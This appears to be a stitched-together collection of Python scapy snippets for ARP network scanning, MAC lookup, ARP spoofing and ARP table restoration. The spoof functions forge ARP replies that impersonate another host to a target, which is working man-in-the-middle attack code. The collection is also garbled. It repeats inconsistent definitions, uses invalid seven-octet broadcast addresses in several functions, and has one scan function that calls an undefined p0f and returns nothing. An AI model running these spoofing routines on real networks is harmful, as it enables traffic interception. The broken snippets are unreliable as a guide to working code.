def scan(ip): """ Run an ARP scan against the IP/Subnet and return a list of clients on the network with their mac address and ip address :param ip: str :return: list[dict] """ # Create an ARP request destined for the ip/subnet arp_request = scapy.ARP(pdst=ip) # Create an ethernet frame to the broadcast address # REASON: Need to send to the Broadcast address because # the source machine doesn't know who to send the # packet to. Each request is broadcast to the # entire network asking WHOIS <IP ADDRESS> broadcast = scapy.Ether(dst=BROADCAST_ADDRESS) # Combine the two layers to create an ARP packet arp_broadcast_request = broadcast/arp_request # Create a list of all responses with their MAC address and IP address answered, unanswered = scapy.srp(arp_broadcast_request, timeout=1, verbose=False) clients = [{"mac": answer.hwsrc, "ip": answer.psrc} for sent, answer in answered] return clients
def get_mac(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc
def spoof(self, target_ip, spoof_ip): target_mac = self.get_mac(target_ip) paket = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.send(paket, verbose=False)
def scan(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request list_answered = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] clients_list = [] for element in list_answered: p0f(element[0])
def restore(destination_ip, source_ip): destination_mac = get_mac(destination_ip) source_mac = get_mac(source_ip) packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) scapy.send(packet, count=4, verbose=False)
def get_mac(self, ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request list_answered = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] mac_address = list_answered[0][1].hwsrc return mac_address
def scan(self, ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request list_answered = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] clients_list = [{ "ip": element[1].psrc, "mac": element[1].hwsrc } for element in list_answered] return clients_list
def scan(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast/arp_request answered_list = scapy.srp(arp_request_broadcast, timeout=60, verbose=False)[0] clients_list = [] for element in answered_list: client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} clients_list.append(client_dict) # print(element[1].psrc + "\t\t" + element[1].hwsrc) return clients_list
def get_mac_address(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst=BROADCAST_ADDRESS) arp_broadcast_request = broadcast / arp_request answered, unanswered = scapy.srp(arp_broadcast_request, timeout=1, verbose=False) if not answered: print(f"[-] Could not locate {ip} on the network.") sys.exit("[-] Exiting.") else: sent, answer = answered[0] return answer.hwsrc
def restore(destination_ip, source_ip): """ Send an ARP response to the destination IP correcting the MAC address for the source IP. """ destination_mac_address = get_mac_address(destination_ip) source_mac_address = get_mac_address(source_ip) packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac_address, psrc=source_ip, hwsrc=source_mac_address) scapy.send(packet, count=4, verbose=False) print( f"[+] Reset {source_ip}'s Mac Address in {destination_ip}'s ARP table." )
def spoof(target_ip, spoof_ip): """ Spoof an ARP response back to the target machine impersonating as the spoofed IP Address. :param target_ip: Target Machine IP :param spoof_ip: IP to spoof as :return: """ target_mac_address = get_mac_address(target_ip) scapy.send(scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac_address, psrc=spoof_ip), verbose=False)
def send_arp_msg(): """send_arp_msg Send an ``ARP`` message to the network device (``enp0s3`` by default). """ dev = os.getenv("ARP_INTERFACE", "enp0s3").strip().lstrip() network_details = netifaces.ifaddresses(dev) dst_ip = os.getenv("ARP_DST_IP", network_details[2][0]["addr"]) dst_mac = os.getenv("ARP_DST_MAC", network_details[17][0]["addr"]) print(("Sending ARP to mac={} ip={}").format(dst_mac, dst_ip)) answered, unanswered = kamene.srp(kamene.Ether(dst=dst_mac) / kamene.ARP(pdst=dst_ip), timeout=2, verbose=False) if len(answered) > 0: print(answered[0][0].getlayer(kamene.ARP).pdst + " is up") elif len(unanswered) > 0: print(unanswered[0].getlayer(kamene.ARP).pdst + " is down")